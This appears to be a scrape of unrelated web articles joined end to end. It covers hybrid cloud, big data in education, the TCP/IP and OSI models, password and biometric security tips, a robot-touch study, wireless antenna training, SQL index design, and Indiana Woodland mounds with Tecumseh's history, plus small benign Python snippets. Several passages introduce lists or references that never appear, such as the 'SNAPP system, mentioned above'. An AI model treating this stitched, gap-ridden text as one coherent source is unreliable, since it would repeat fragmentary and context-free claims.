• Private Cloud: Serves a single-user. It can be self-hosted or hosted by a cloud provider.
• Public Cloud: These represent infrastructure-as-a-service offerings purchased from Amazon, Google, IBM or Microsoft.
• Hybrid Cloud: Hybrid cloud architecture combines two different types of infrastructure into a single heterogeneous environment. It can be any combination of a traditional data center, private cloud, and public cloud. Even though these environments remain different, they can work together effectively and function as one environment.
What are Some Hybrid Cloud Examples?
Hybrid cloud architecture works well for the following industries:
• Finance: Financial firms are able to significantly reduce their space requirements in a hybrid cloud architecture when trade orders are placed on a private cloud and trade analytics live on a public cloud.
• Healthcare: When hospitals send patient data to insurance providers, hybrid cloud computing ensures HIPAA compliance.
• Legal: Hybrid cloud security allows encrypted data to live off-site in a public cloud while connected o a law firm’s private cloud. This protects original documents from threat of theft or loss by natural disaster.
• Retail: Hybrid cloud computing helps companies process resource-intensive sales data and analytics.
What is Hybrid Cloud Strategy?
Tech professionals use hybrid cloud strategy in the following ways, according to a 451 Research report:
• Dynamically move workloads to the most appropriate IT environment based on cost, performance and security.
• Utilize on-premises resources for existing workloads, and use public or hosted clouds for new workloads.
• Run internal business systems and data on premises while customer-facing systems run on infrastructure as a service (iaaS), public or hosted clouds.
Increasingly, a hybrid cloud model is called a hybrid cloud environment. This environment strategy involves running applications in different environments with multiple public and private cloud vendors, while each element lives in one hybrid domain.
Why use Hybrid Cloud?
Hybrid cloud architecture allows an enterprise to move data and applications between private and public environments based on business and compliance requirements.
For example, customer data can live in a private environment. But heavy processing can be sent to the public cloud without ever having customer data leave the private environment. Hybrid cloud computing allows instant transfer of information between environments, allowing enterprises to experience the benefits of both environments.
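As an illustration of such a policy, here is a minimal, hypothetical Python sketch; the field names and thresholds are invented for illustration and do not come from any real orchestration API:

```python
# Hypothetical placement policy: keep regulated or customer data private,
# burst heavy processing to public cloud, default to on-premises.
def place_workload(workload: dict) -> str:
    if workload.get("contains_customer_data") or workload.get("compliance") in {"HIPAA", "PCI"}:
        return "private-cloud"        # data never leaves the private environment
    if workload.get("cpu_hours", 0) > 1_000:
        return "public-cloud"         # elastic capacity for heavy processing
    return "on-premises"

print(place_workload({"name": "claims-db", "compliance": "HIPAA"}))  # private-cloud
print(place_workload({"name": "analytics", "cpu_hours": 5_000}))     # public-cloud
```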
Hybrid cloud benefits include the following:
• Choice: The option of multiple environments provides flexibility and the ability to avoid vendor lock-in.
• Disaster Avoidance: Multiple environments ensure compute resources are always available, avoiding downtime due to natural disaster or human error.
• Compliance: Many hybrid cloud environments can help enterprises achieve their goals for governance, risk management and compliance regulations.
How does Avi Networks Help with Hybrid Cloud Deployments?
With enterprises running their applications in a mix of private data centers and multiple public cloud environments, choices for application services are increasingly driven by technologies that can be infrastructure agnostic and those that have uniform architecture and user experience irrespective of the environment.
For more on the actual implementation of load balancing, security applications and web application firewalls check out our Application Delivery How-To Videos.
For more information on hybrid cloud deployments see the following resource:
The Internet population is growing very fast. Apparently, by 2017, the online community already reached 3.7 billion, and the numbers are still growing:
All these people produce tons and tons of data, passing this information over to other Internet users. Reportedly, we produce over 2.5 quintillion bytes of data on average every day.
A large share of this data belongs to the most active Internet users, among whom are school and college students. Looking for, processing, and working with information online, they leave digital breadcrumbs that become part of the big data collected every day. This data, in turn, impacts education, changing it and bringing both advantages and disadvantages.
However, before we get into the good and the bad, let’s clarify what big data is.
“Big data contains a great variety of information that arrives in increasing volumes and velocity.”
Thus, big data is more voluminous than traditional data, and includes both processed and raw data.
Commonly, this data is too large and too complex to be processed by traditional software. Besides, such amounts of information bring many opportunities for analysis, allowing you to take a glance at a specific concept from many different perspectives.
It is traditionally considered (and suggested by Oracle in the article mentioned above) that big data is described by three main concepts: volume, velocity, and variety. However, these three concepts do not adequately describe the phenomenon of big data without the fourth and fifth components, variability and veracity.
Here’s how all these components contribute to big data:
Now that we have given big data an in-depth look, let's talk more about its impact on education and the benefits and harms that it brings along.
Big data has brought significant changes to many aspects of education. According to a study, published by the Publications Office of the European Union, the most significant change brought by the big data to education, is the ability to monitor educational systems.
Here are some examples of how it works:
All these implementations are benefits of the influence of big data on the education system. These systems generate tons of big data themselves, keeping all parties in the educational process regularly updated.
The feature of automation, brought by these big-data-based systems, has itself resulted in many other benefits, like:
The massive volumes of data bring much value for both educators and students.
Indeed, big data can solve many issues that educators struggled with a few decades ago. However, is it harmless? Not quite. Let's take a look at the dark side of big data and its possible negative impact on education to evaluate some of the biggest risks.
The biggest issue, however, is ethical, and it deals with the misuse of personal information. For instance, the error in using the SNAPP system, mentioned above, can result in the massive leakage of personal data.
Due to the lack of proper treatment and protection, personal information stored in data centers and used for analytical purposes in education still can be misused. With the risks of data theft increasing, this issue undoubtedly remains to be solved.
While having obvious benefits for the education system, big data still has many drawbacks, linked to the lack of technology to process it and put it to use. These disadvantages, though, bring a lot of data themselves that can be learned from.
The analysis of big data depends on many factors, like transparency, value to both the learner and the educator, expense, and openness. Taking these features into consideration, when working with big data in education will allow you to benefit from this data to the maximum extent.
In conclusion, the influence of big data and its use in education is still the subject of research. However, with further development, big data analysis can be effectively put to use and bring even more benefits for students and educators.
In the previous section, we learned that TCP/IP is a suite of protocols and rules. It allows us to communicate with other computers and devices over a connection oriented network. What we didn’t cover was the TCP/IP and OSI model- which helps us understand the TCP/IP suite in a manner of layers and modules.
The TCP/IP Model and Modular Design
TCP/IP is responsible for a wide range of activity: it must interface with hardware, route data to appropriate places, provide error control, and much more. If you are starting to think the TCP/IP suite can get confusing, you wouldn’t be the first.
The developers of TCP/IP thankfully designed what we call a modular design- meaning that the TCP/IP system can be divided into separate components. You may call these layers or modules. But why use a modular design? Not only does it aid in the education process, but it also lets manufacturers easily adapt to specific hardware and operating system needs.
For example- if we had a token ring network and an extended star network, we surely wouldn’t want to create entirely different network software builds for each one. Instead, we can just edit the network layer, called the Network Access Layer, to allow compatibility. Not only does this benefit manufacturers, but it greatly aids networking students in education. We can dissect the TCP/IP suite into different layers, and then learn about each layer’s specifics one at a time. Below you’ll see the TCP/IP model divided into four layers.
- Network Access Layer – The Network Access Layer is fairly self explanatory- it interfaces with the physical network. It formats data and addresses data for subnets, based on physical hardware addresses. More importantly, it provides error control for data delivered on the physical network.
- Internet Layer – The Internet Layer provides logical addressing. More specifically, the internet layer relates physical addresses from the network access layer to logical addresses. This can be an IP address, for instance. This is vital for passing along information to subnets that aren’t on the same network as other parts of the network. This layer also provides routing that may reduce traffic, and supports delivery across an internetwork. (An internetwork is simply a greater network of LANs, perhaps a large company or organization.)
- Transport Layer – The Transport Layer provides flow control, error control, and serves as an interface for network applications. An example of the transport layer would be TCP- a protocol suite that is connection-oriented. We may also use UDP- a connectionless means of transporting data. (See the sketch after this list.)
- Application Layer – Lastly, we have the Application Layer. We use this layer for troubleshooting, file transfer, internet activities, and a slew of other activities. This layer interacts with many types of applications, such as a database manager, email program, or Telnet.
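To make the Transport Layer concrete, here is a minimal Python sketch of how an application chooses between TCP and UDP through the sockets API; the destination hosts and ports are placeholders:

```python
import socket

# SOCK_STREAM selects TCP: a reliable, connection-oriented byte stream.
tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp.connect(("example.com", 80))          # three-way handshake happens here
tcp.sendall(b"HEAD / HTTP/1.0\r\nHost: example.com\r\n\r\n")
print(tcp.recv(64))                        # first bytes of the reply
tcp.close()

# SOCK_DGRAM selects UDP: connectionless datagrams, no handshake, no delivery guarantee.
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp.sendto(b"ping", ("192.0.2.1", 9))      # fire-and-forget to a placeholder address
udp.close()
```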
The above layers are more complex than the general descriptions provided, but rest assured, we will get into the specifics in later sections. For now we have another model to learn- the OSI model.
The Open System Interconnection Model
The Open System Interconnection Model, more commonly known as simply OSI, is another model that can help break the TCP/IP suite into modules. It describes the same stack as the TCP/IP model, except that it divides it into more layers. Cisco currently promotes the OSI model, since it aids in learning the TCP/IP stack in an easier manner. Likewise, you will see the OSI model on many Cisco exams.
Instead of four layers, the OSI model has seven. You can see a direct comparison of the two models below; notice that only the Application Layer and Network Access Layer are divided into smaller layers, and the Internet Layer is renamed to the "Network Layer."
- Physical Layer – The Physical Layer converts data into streams of electric or analog pulses- commonly referred to as "1's and 0's." Data is broken down into simple electric pulses, and rebuilt at the receiving end.
- Data Link Layer – The Data Link layer provides an interface with the network adapter, and can also perform basic error checking. It also maintains logical links for subnets, so that subnets can communicate with other parts of the network without problem.
- Network Layer – Much like the Internet Layer of the TCP/IP model, the Network Layer simply supports logical addressing and routing. The IP protocol operates on the Network Layer.
- Transport Layer – Since we left out the error and flow control in the Network Layer, we introduce it into the Transport Layer. The Transport Layer is responsible for keeping a reliable end-to-end connection for the network.
- Session Layer – The Session Layer establishes sessions between applications on a network. This may be useful for network monitoring, using a login system, and reporting. The Session Layer is actually not used a great deal over networks, although it still sees good use in streaming video and audio, or web conferencing.
- Presentation Layer – The Presentation Layer translates data into a standard format, while also being able to provide encryption and data compression. Encryption or data compression does not have to be done at the Presentation Layer, although it is commonly performed in this layer.
- Application Layer – The Application Layer provides a network interface for applications and supports network applications. This is where many protocols such as FTP, SMTP, POP3, and many others operate. Telnet also operates at this layer- if a Telnet connection succeeds, each layer of the OSI model below it should be functioning properly.
Now, the Bad News
Now that we’ve reviewed each layer, you have to commit each layer and its function to memory. Most networking exams require that knowledge of each layer be present. We realize that remembering seven different layers is tough- so we use a mnemonic. A mnemonic is simply a tool we can use to remember all seven layers. Look at each beginning letter of each layer- it’s PDNTSPA, starting with the Physical Layer. You could come up with a phrase such as “Please Do Not Throw Sausage Pizza Away,” to help you remember each layer name.
It is important to remember that each layer is a standard- not an implementation. This means that not all network communication will necessarily use each layer. We partly covered this with the Session Layer, which isn’t always necessarily used. Some devices such as routers only operate at the third layer and below. Some devices are even more limited- repeaters only work at the physical layer of the OSI model.
The OSI and TCP/IP model are fairly prevalent in networking- don't be surprised if you see them more than you'd like. If you take anything from this section, remember to use a mnemonic to memorize each layer name in order. You can get as crazy as you'd like with the phrase you use, but "Please Do Not Throw Sausage Pizza Away" is generally the easiest to remember.
In the next article, we will be specifically looking at how data moves from one computer to another- and how it moves through the OSI model. Don't worry if this seems new to you and you don't quite take all of it in, simply review it some more and move on to the next section. And, as always, you can review the previous section if you didn't quite grasp all the concepts in this one.
When it comes to today's digital and mobile world, you can never be too safe. The world is becoming more digitized and connected, leaving organizations and consumers alike exposed to looming advanced threats. In 2017 alone the world faced some of the biggest security breaches, including Equifax, Yahoo and WannaCry, just to name a few. These breaches have resulted in the majority of Americans' personally identifying information being stolen, not to mention a significant portion of the rest of the world's. Of note, a large percentage of these data breaches were attributed to compromised credentials. Over the last few years, data breaches have been steadily rising in both size and severity, and the security measures that firms are taking aren't stemming the tide. A recent report from Cybersecurity Ventures found that the number of businesses falling victim to attacks rose by 21 percent in the U.S. last year, and doubled in the UK in the past two years.
Hackers are always working on new and unexpected ways to steal our private data, and a simple PIN or password on a smartphone just isn’t enough to ensure that our information is secure. While newer authentication methods like biometrics are becoming more mainstream, passwords are still the primary way people access their accounts. Despite the commonly known rule to vary account passwords, the majority of people use the same password for more than one account.
These days, people are storing personal information online much more than in the past. Consumers use mobile apps and websites to do almost everything – from banking to interacting with friends and family on social media. Even accessing sensitive data like health records is done on digital platforms. Coupled with the explosion of websites and apps is the increasing concern consumers have about the security of their data. A 2017 study by Gigya found that more than two-thirds of adults are concerned about security and privacy, while 68 percent say they don't trust companies to handle their personal data properly.
To combat these concerns, here are four tips to better prepare against threats in an unsafe world:
1. Education is Power
Hackers aren’t just targeting consumer-focused businesses. Banks, healthcare organizations, and government agencies are also prime targets for data breaches. Furthermore, massive breaches like those at Equifax and Yahoo have already resulted in the private information of billions of people being leaked online. As a consumer, you are the strongest line of defense. It is vital to a take proactive, ongoing approach to educate yourself on the implications of hacks. Simple things like checking your bank statement regularly or shredding sensitive mail can reduce the likelihood of a breach caused by human error.
2. Embrace Multi-Factor Authentication
Passwords are composed of an assortment of letters, numbers, and symbols. Unfortunately, no matter how complex or unique, passwords can no longer protect you. While most people use easy-to-crack passwords such as "123456," many also use the same password for all their online accounts, which is the same thing as having one key for the house, car, safety-deposit box, and office. A consumer survey commissioned by Veridium found that 50 percent of respondents use the same password for up to 10 personal accounts. This creates a single point of failure: if the wrong person were to crack it, the information could be exploited with devastating results. Passwords are also inconvenient to remember, considering that we now need them for so many actions in our daily lives.
To achieve safety, best practices dictate moving beyond passwords and embracing multi-factor authentication. This includes using biometrics. Capturing your biometrics via a smartphone optimizes security while remaining convenient to use throughout the day.
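As an illustration of one common second factor, here is a minimal sketch using the third-party pyotp library to generate and verify a time-based one-time password (TOTP); treat it as a demonstration rather than a hardened implementation:

```python
import pyotp  # pip install pyotp

secret = pyotp.random_base32()   # provisioned once per user, e.g. via a QR code
totp = pyotp.TOTP(secret)

code = totp.now()                # the 6-digit code the user's authenticator app shows
print(totp.verify(code))         # True -- the server checks this alongside the password
```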
3. Change your Social Media Behavior
In today’s age, social media is a common platform for consumers to overshare private information. Although people of all ages are guilty of oversharing, it is especially a concern with younger generations who are often unaware of the consequences. Every time a consumer shares their location, answers an online quiz, talks about their pet dog, or wishes someone a happy birthday, they are giving hackers clues to what their passwords or answers to their security questions might be.
Security experts warn that this oversharing of personal information is contributing to the widespread reports of data breaches and hacked social media accounts. Even if you do not fall victim yourself, oversharing may come back to haunt you tomorrow. Next time you are online, be mindful of what you are sharing and posting on your social media channels.
4. Safeguard your Data
Even though technology and hackers are becoming more advanced, many people still do not take appropriate steps to safeguard their data – despite most saying they are concerned about protecting their information. Forty-seven percent of online shoppers said they stored some or all of their credit-card information on retailer websites for quick and easy access to their accounts, and yet 40 percent of online shoppers stated that they have not changed their password in the past year.
Whether through targeted phishing attacks or database hacks that leak millions of usernames and passwords out onto the web, there's no reason to suspect that this hacking danger will end anytime soon. Come to terms that you will, at some point, get hacked. Your personal identity will be stolen. It’s not an “if,” but a “when.”
Luckily, there are steps that you can take to protect yourself. Many people think that they can’t do anything to protect their digital lives, but in many ways, smartphones, digital mentalities, and the availability of multi-factor authentication tools demonstrate the power of biometrics for protecting consumers.
There is an ongoing debate on whether people are trading privacy and security in exchange for convenience and free services, especially now that we, as consumers, store so much of our personal information on smartphones and on cloud services. As a result, corporations and consumers have been searching for a safe and easy way to protect personal information. Many are taking steps toward replacing passwords, PINs, tokens, and even usernames with biometrics.
In an increasingly digital world, with more private data being stored on mobile devices and in the cloud, the need for ironclad security is paramount. Using your biometrics – your unique traits or behavioral characteristics – to prove identity safeguards your most valuable assets in a way that’s both convenient and secure.
James Stickland, CEO of Veridium
Humans didn't evolve in an environment full of machines, and as a result we have a lot of instinctive reactions to robots that mirror our reactions to other humans. Studies have shown that people have a hard time being rude to a robot's face, just as we do with other people. We even use the same part of our brains to recognize robot and human faces. A research group at Stanford recently wondered if our instinctive reactions to robots would extend to the way we touch their bodies. And they did a series of tests in which subjects were asked to touch robots in "accessible" regions like the hands and then "inaccessible" ones like the buttocks and genitals.
The researchers will present the results of their work this week at the Annual Conference of the International Communication Association in Fukuoka, Japan. They wanted to focus on people's reactions to touch because there is already a large body of evidence showing that humans have complex reactions to touching each other, ranging from emotions to physiological changes we aren't always aware of. As robots take on the roles of caretakers, workplace helpers, and service workers, it's important to explore whether touch should be incorporated into how we design robot interfaces. But first, we need to understand whether humans react to robot touch the way they react to human touch.
To answer that question, the researchers used a human touching scale developed back in the 1960s by Sidney Jourard. Jourard used the term "body accessibility" to rank body parts based on how willing people were to allow others to touch them. As the researchers wrote:
The most accessible regions of the body were the hands, head, and arms while the least accessible region was the genitals. Does the concept of body accessibility extend to robots? If people perceive a robot as simply being a device that can be touched, we would expect no difference in response when touching one part of its body versus another, particularly if its body is of uniform texture and material. If people perceive a robot using a social lens, we would anticipate that touching low accessibility regions would elicit an emotional response associated with greater intimacy between the person and the robot.
The researchers brought study participants into a room with a small humanoid robot (Aldebaran Robotic’s NAO), who was sitting on a table. The robot was programmed to ask participants to touch 12 different parts of its body. Meanwhile, the participants were also wired up to a sensor that tested their skin conductivity. Copious research has already demonstrated that humans' skin becomes more conductive when we're "emotionally aroused." Keep in mind that emotional arousal isn't the same thing as sexual arousal—it simply refers to any strong emotional reaction, from anxiety to desire, that can be measured physiologically.
This robot touching test was designed to determine whether people would have emotional reactions to touching "low accessibility" regions on the robot, like buttocks and genitals.
Not only did study participants have an emotional reaction to touching the robot's inaccessible regions, but they also took fractions of a second longer to touch those parts as well. On an unconscious, instinctual level, humans were reacting to this little humanoid robot as if it were another person. The researchers explain:
These responses are not simply an act of playing along—they occur on a deeper physiological level. People are not inherently built to differentiate between technology and humans. Consequently, primitive responses in human physiology to cues like movement, language, and social intent can be elicited by robots just as they would by real people.
Though there are about a million jokes to be made about this study, the findings are actually quite important. They provide a major insight into UX design for roboticists, especially ones who want to build social robots that will interact with people. Knowing that humans will have unconscious reactions to robots similar to those they have to humans could help in a variety of situations. A gentle touch from a robot could be reassuring. Hugging a robot might trigger physiological reactions that are calming. Touching a robot could also trigger discomfort and even violence.
Jamy Li, one of the researchers who conducted the study, said in a release, "Our work shows that ... people respond to robots in a primitive, social way. Social conventions regarding touching someone else's private parts apply to a robot's body parts as well." This raises the question of what happens when a robot touches a human in an inaccessible body part. Maybe that will mean some robots get a punch in the face. Or they'll be welcomed in a way that hints at the future role of robots in the adult industry.
New Training: Troubleshooting Wireless Networks
In this 4-video skill, CBT Nuggets trainer Jeremy Cioara teaches you how to troubleshoot common wireless connectivity and performance issues. Watch this new networking training.
Watch the full course: CompTIA Network+
This training includes:
28 minutes of training
You’ll learn these topics in this skill:
Troubleshooting Wireless: The Nature of Airwaves
Troubleshooting Wireless: Fighting Frequencies
Troubleshooting Wireless: Understanding Antenna Types
Troubleshooting Wireless: Misconfigurations
Radio Communication Requires Different Types Of Antennas For Different Jobs
Wireless networks can be more difficult to maintain and troubleshoot than traditional wired networks in some ways. That's due to the nature of how wireless network-equipped devices have to communicate with each other. Controlling radio waves can be much more difficult than controlling the electrons being pushed through a copper wire. So, IT pros will need to understand the different types of antennas that wireless network equipment can use and which type of antenna is best for each use case.
For example, a typical wireless router found inside a consumer's home uses an antenna that spreads a WiFi signal out like a flat ball. This ensures that WiFi signals are spread as evenly throughout the home as possible.
On the other hand, if a farmer needs to shoot a WiFi signal to an IoT device on a piece of farm equipment across a field, they might use an antenna that focuses that WiFi signal more like a shotgun blast. With these types of antennas, the WiFi signal does become more spread the longer it travels, but it is focused in a single direction. This type of antenna allows radio waves to travel a longer distance at the cost of coverage.
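The tradeoff can be put into rough numbers with the standard free-space path loss formula. In the Python sketch below, the transmit power and antenna gains are assumed values chosen only for illustration:

```python
from math import log10

def fspl_db(distance_km: float, freq_mhz: float) -> float:
    """Free-space path loss in dB (distance in km, frequency in MHz)."""
    return 20 * log10(distance_km) + 20 * log10(freq_mhz) + 32.44

tx_power_dbm = 20                      # assumed transmitter power
for name, gain_dbi in [("omnidirectional", 2), ("directional (Yagi-style)", 15)]:
    rx = tx_power_dbm + gain_dbi - fspl_db(1.0, 2400)   # 1 km link at 2.4 GHz
    print(f"{name:<25} -> received about {rx:6.1f} dBm")
```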
There are other types of antennas as well. Likewise, there are ways of controlling interference and spread for the various types of antennas, too. IT pros will need to understand what types of antennas are available for radio equipment and how each antenna works to pick the right one for the job. Different types of radio equipment will have different antenna requirements, too, so a Yagi antenna meant for a WiFi network may not work for a communications device like a CB radio. IT pros will need to understand those differences as well.
Don’t believe everything you read on the web about clustered vs. nonclustered indexes
I suspect almost every reader of this article has seen or heard the following, as it is posted “everywhere” on the web. Yet if the advice is taken blindly, it can rob your system of top performance.
- Every table should have a primary key (good idea)
- Every table should have a clustered index (good idea)
- Every table should have a primary key that is a single column, integer, identity key (not a bad idea, but too simplistic to take without a grain of salt)
- Every primary key should be a clustered index (herein lies the rub, and the focus of this article)
First, a few facts. Any index may be clustered or nonclustered, but you can have only one clustered index per table (this is one important reason to think carefully before choosing your clustered index). A primary key is instantiated with an index, but this does not have to be a clustered index. This last note surprises more than a few folks, but has been true at least since SQL 4.0 running on OS/2 (anybody remember that one?).
Let’s start with clustered vs. nonclustered indexes.
Clustered indexes are b-tree indexes whose leaf level is the data page of the table; hence, the data pages are physically sorted in index order (this is mostly true, and you can act and tune as if it is completely true).
Nonclustered indexes are also b-tree indexes, but the leaf level is standard, and contains pointers to the data pages.
Let’s do this graphically:
Presume this is a “customer” table which is clustered on the customer’s last name. The data pages become physically sorted by last name at index creation time. Then, further index levels are built out as follows:
While (number of pages in the index level) > 1
    Create a new index level
    Copy the first entry from each page of the prior level
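For readers who prefer runnable code, here is a small Python sketch of that loop, assuming a hypothetical page size of three entries:

```python
def build_index_levels(sorted_keys, entries_per_page=3):
    # Chunk the sorted keys into "pages" to form the first index level.
    paginate = lambda xs: [xs[i:i + entries_per_page] for i in range(0, len(xs), entries_per_page)]
    levels = [paginate(sorted_keys)]
    while len(levels[-1]) > 1:                     # more than one page on the top level
        firsts = [page[0] for page in levels[-1]]  # copy the first entry from each page
        levels.append(paginate(firsts))            # ...into a new index level
    return levels

keys = ["Albert", "Baker", "Brown", "Jones", "Smith", "Young"]
for depth, level in enumerate(build_index_levels(keys)):
    print(f"level {depth}: {level}")
```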
In the above, simplistic example, we have three levels of index, with the first index level being the data (this is unique to the clustered index).
Finding a row in the table via a b-tree structure, we start in the root page. Now find rows whose key is the last name “Baker.”
We start at the root page, and see that “Baker” is between “Albert” and “Jones” by following the “Albert” pointer to the next level. Then we see that Baker is between “Albert” and “Brown” by following the “Albert” pointer yet again. Now, we find ourselves on the data page, and have done so using three page requests.
Since you can have only one clustered index (because you can only sort the data one way), all other indexes will be nonclustered.
Nonclustered index graphically:
This graphic represents an index on the customer’s first name. The nonclustered index build starts a bit differently than the clustered, as the data is sorted on last name, not first name.
The first index level will have an entry for every row of data (vs. every page of data for the clustered index). So, 1 million customers, 1 million index entries.
The rest of the nonclustered index levels are built the same way the clustered index levels are built.
So, looking for all the “Amy” entries: Amy is between Amy and George, so we follow the Amy pointer to the next level. Amy is between Amy and Bob, so we again follow the Amy pointer. Now we are on the nonclustered index level leaf page and have the list of row IDs that we will use to identify all the Amys. We’re still not done, though, because for each matching entry, we still need to retrieve the matching rows.
Doing some math:
Finding Baker cost us three page requests. Finding Amy cost us three page requests plus one for each entry, which gets us five page requests. When we start diving into this, we see that if we want multiple rows, the clustered index performs much better.
For example, if there are 50 Bakers to retrieve: possibly still three I/Os, possibly four if they run over to the next page. If there are 50 Amys, then it’s three I/Os to get to the leaf level, then 50 more page requests to retrieve the rows, for a total of 53.
(Compared to a table scan, I’ll still prefer the index!)
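The same arithmetic in a few lines of Python, using the numbers from the example above:

```python
index_levels = 3      # root -> intermediate -> leaf, as in the diagrams above
matching_rows = 50

# Clustered: the leaf level IS the data, so matching rows sit side by side;
# at worst they spill over onto the next page in the chain.
clustered_io = index_levels + 1

# Nonclustered: after reaching the leaf, each matching entry costs one more
# page request to fetch its row.
nonclustered_io = index_levels + matching_rows

print(clustered_io, nonclustered_io)   # 4 53
```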
Now, let’s talk about a simple join, say an invoice header to an invoice detail. Let’s further speculate that there’s an average of 50 detail rows per header.
If you have a nonclustered index on the detail, you have 50 page requests to perform after you have reached the right index page. If you have a clustered index on the detail, you may have no more of this to deal with, or you may need to simply read the next page on the chain.
In short, for simple joins, joining on a clustered index is dramatically faster than joining on a nonclustered index.
As the joins become more complex (say, a three table join), keep multiplying by 50 with each level.
Refer back to the nonclustered index, and look at the index pages, which are in fact chained together.
Doesn’t that list look remarkably like the base page of the clustered index? In fact, think about a different query: select count(*) from the table where first_name = ‘Amy.’
Now we don’t have to read the extra pages, as the data we want is directly on the index page. The optimizer is aware of this, and the DBMS picks the data right off of the index page. This is called “index covering.”
Index covering is the one time that the nonclustered index may be faster than the clustered index, as more entries are likely to fit on an index page (entry width) than on the data page (full row width). In fact, it’s common to add columns to nonclustered indexes for this very reason. If all columns referenced in a query (where clause, join clauses, select list) are in the index, the server will not bother reading the data pages.
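A toy Python sketch makes the point: if the leaf level of the nonclustered index holds (key, row ID) pairs, a count by key never touches the data pages:

```python
# Leaf level of a hypothetical nonclustered index on first_name: (key, row_id) pairs.
nc_leaf = [("Amy", 17), ("Amy", 42), ("Bob", 3), ("George", 8)]

# select count(*) ... where first_name = 'Amy'
# The answer comes straight from the index entries -- no data-page reads.
amy_count = sum(1 for key, _rid in nc_leaf if key == "Amy")
print(amy_count)  # 2
```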
Don’t drink the Kool-Aid.
Don’t choose indexes based upon white papers you’ve read. Choose indexes based upon your knowledge of how the optimizer chooses indexes, and what it can do with them.
The Kool-Aid trademark is the exclusive property of Kraft Foods, Inc. All other trademarks are the property of their respective owners.
Yost Woodland Mounds
This site is on a bluff above the Tippecanoe River, just about 285 meters from that river and 980 meters from where it flows into the Wabash River.
The site is between the small town of Battle Ground and the smaller settlement of Americus, northeast of Lafayette and West Lafayette, Indiana.
The Yost Woodland complex has been designated as sites 12-T-925, 12-T-1083, and 12-T-1119 in the 2006 report Archaeological Investigations at Site 12-T-59 and Two Other Locations in Prophetstown State Park, Tippecanoe County, Indiana. That was written by Michael Strezewski of the Indiana University — Purdue University campus in Fort Wayne. He's now a faculty member at the University of Southern Indiana in Evansville.
In that paper Strezewski writes:
Materials identified at 12-T-925 were all non-diagnostic prehistoric artifacts, and consisted of seven chert flakes and five pieces of fire-cracked rock. Small quantities of prehistoric, non-diagnostic artifacts were also recovered from sites 12-T-1083 and 12-T-1119.
Was this site abandoned before the first Europeans arrived in the area? Possibly not. The French were active in the area almost a century before the British-derived U.S. forces showed up.
The settlement of Waayaahtanonki was occupied by the Wea tribe. The early French traders spelled it as Ouiatenon. The settlement was on the southeast shore of the Wabash river twenty-nine kilometers downstream of where the Tippecanoe river flowed into the Wabash river, in today's western Tippecanoe County. At the time Europeans considered the area to be New France. The French built a fortified trading post in 1717, Fort Ouiatenon, on the opposite bank of the river. In 1760 the French agreed to withdraw from the Wabash river valley and cede the area to British control.
In 1791 U.S. President George Washington had his Secretary of War issue orders for Brigadier General Charles Scott of Kentucky to lead a mission to kill the Wea people. Scott's force of 33 officers and 760 mounted Kentucky volunteers arrived on June 1, 1791, and killed as many men as they could, taking 41 women and children prisoner. They burned the town and several hundred acres of corn. The Americans had arrived.
Go out Pretty Prairie Road northeast from Battle Ground, pass the golf club and turn into the residential Indian Mount Drive, and continue toward its end.
It ends by splitting into two fairly short driveways. Stop before going that far. Pull off under the trees by the last sharp turn to the right and walk from there. If it hasn't been raining to soften the ground, you can easily and safely pull off there, and then turn around without going to the driveways at the end. The number of "Neighborhood Watch" signs made me think the locals might be rather sensitive about turning around in their driveways.
The mounds will be to your left, to the southeast of the road, between the road and the trees.
There are four mounds along the southeast side of the road, about a meter to a meter and a half tall.
Below is the view from that last turn, looking southwest. There are four obvious mounds. The first three are in the sunlight, the fourth at the far end is in the shadows of the trees. Let's call them #1, #2, #3, and #4, with #1 the closest, at the northeast end, and #4 at the southwest end, farthest from us.
Here are #3 and #4 toward the southwest end, #3 in the sun and #4 mostly shadowed.
Here I'm looking straight southeast from the road to #4.
Turning around and looking northeast, from right to left here are #3, #2, and, barely visible, #1.
A close-up of just #3.
Here are #2 right of center, and #1 left of center directly in front of the white house. Between them, a ravine leads down toward the Tippecanoe River.
Here we can see a little more of the rather subtle #1 and the beginning of the ravine.
Tecumseh or Tecumthé in the traditional pronunciation was born between 1764 and 1771 in today's Ohio. He was born into the Panther clan of the Kispoko division of the Shawnee tribe.
The American Revolutionary War ended in 1783, and the new United States claimed the land north of the Ohio River by right of conquest, thinking that it was theirs because they had defeated the British, who had claimed it while ignoring the people who had been living there for millennia. From then until 1798, Tecumseh moved around along the Ohio River and the areas that became the states of Ohio, Indiana, Kentucky, Missouri, and Tennessee. By 1798 Tecumseh was both civil and military leader of a Kispoko band of about 50 warriors and 250 other people. They settled then along the White River near today's Anderson, Indiana.
The native people in the area were suffering from European diseases, alcoholism, poverty, and the loss of their land and their way of life. Several religious prophets emerged, offering explanations and remedies for the native people's crisis. One of these was Tecumseh's younger brother Lalawéthika. In 1805 he became a healer in their village, and began preaching the ideas espoused by earlier holy men, including the Delaware prophet Neolin.
Lalawéthika urged the native people to reject European influences, stop drinking alcohol, eat only Native food, and wear traditional Shawnee clothing.
Lalawéthika became known as the Shawnee Prophet, and he and Tecumseh founded a new town near the ruins of Fort Greenville in today's Ohio, where a 1795 treaty strongly in favor of the English invaders had been signed. It attracted visitors and converts from several different tribes.
In 1808 Tecumseh and the Prophet established a settlement northeast of today's Lafayette, Indiana. The Prophet, Lalawéthika, had adopted a new name, Tenskwatawa, meaning The Open Door, the door through which followers could achieve salvation. The settlement, which Europeans would call "Prophetstown", attracted followers from several tribes — Shawnee, Potawatomi, Kickapoo, Wyandot, Winnebago, Sauk, Ottawa, Iowa, and others. Up to 6,000 of the Prophet's followers settled in the area, making Prophetstown larger than any European city in the region.
Tecumseh and Tenskwatawa initially tried to maintain a peaceful coexistence with the United States. But in September 1809 William Henry Harrison, the Governor of the Indiana Territory, negotiated the Treaty of Fort Wayne. Europeans paid to purchase 10,000 to 12,000 square kilometers of land in today's Indiana and Illinois. Many native leaders signed the treaties, but others had been intentionally excluded.
Up to this point, Tecumseh was known to Europeans, if he was known at all, as "the Prophet's brother". But the Treaty of Fort Wayne put Tecumseh and his alliance of tribes on the path to war with the United States.
Through 1811 Tecumseh had meetings with Harrison, and traveled widely to meet with other tribal leaders. C/1811 F1, the Great Comet of 1811, and the New Madrid earthquake of December 1811, arriving before and after the coming battle, provided mystical support to Tecumseh's message. The first was a comet visible to the naked eye for around 260 days. The second was an earthquake with a moment magnitude of 7.2 to 8.2, followed the same day by an aftershock with a moment magnitude of 7.4. It was felt strongly throughout the central and eastern United States, and moderately throughout an area of nearly 3 million km2.
